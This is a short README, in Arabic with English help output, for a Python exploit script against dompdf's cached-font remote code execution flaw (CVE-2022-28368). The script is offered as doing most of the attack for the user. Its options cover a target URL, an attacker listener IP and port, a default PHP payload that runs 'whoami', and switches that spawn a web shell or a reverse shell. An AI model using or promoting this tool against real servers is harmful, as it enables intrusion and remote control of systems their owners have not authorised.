
يحتوي هذا المستودع على سكربت بلغة بايثون سيتعامل مع معظم ثغرة استغلال الخطوط المخزنة مؤقتًا في dompdf (CVE-2022-28368)، كل ما عليك فعله هو إنشاء الطلب.
يحتوي هذا المستودع على سكربت بايثون يتولى معظم أعمال استغلال خطوط dompdf المخزنة مؤقتًا (CVE-2022-28368)، كل ما عليك فعله هو إنشاء الطلب. بل وسيزودك بسلسلة تشغيل لبدء الاستغلال :)
usage: CVE-2022-28368.py [-h] -d DOMPDF_LOCATION [-f FONTNAME] -i HTTP_IP [-p HTTP_PORT] [-P PHP] [-w] [-r]
This script handles the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request
optional arguments:
-h, --help show this help message and exit
-d DOMPDF_LOCATION, --dompdf-location DOMPDF_LOCATION
dompdf location on target webserver (example: http://target.com/vendor/dompdf)
-f FONTNAME, --fontname FONTNAME
Exploit font name (default: expfont.php)
-i HTTP_IP, --http-ip HTTP_IP
HTTP listener IP
-p HTTP_PORT, --http-port HTTP_PORT
HTTP listener PORT (default: 80)
-P PHP, --php PHP PHP to execute (default: <?php system("whoami"); ?>)
-w, --webshell Spawn web shell
-r, --revshell Spawn reverse shell (Uses HTTP listener IP and port 9001 by default)
https://positive.security/blog/dompdf-rce https://github.com/positive-security/dompdf-rce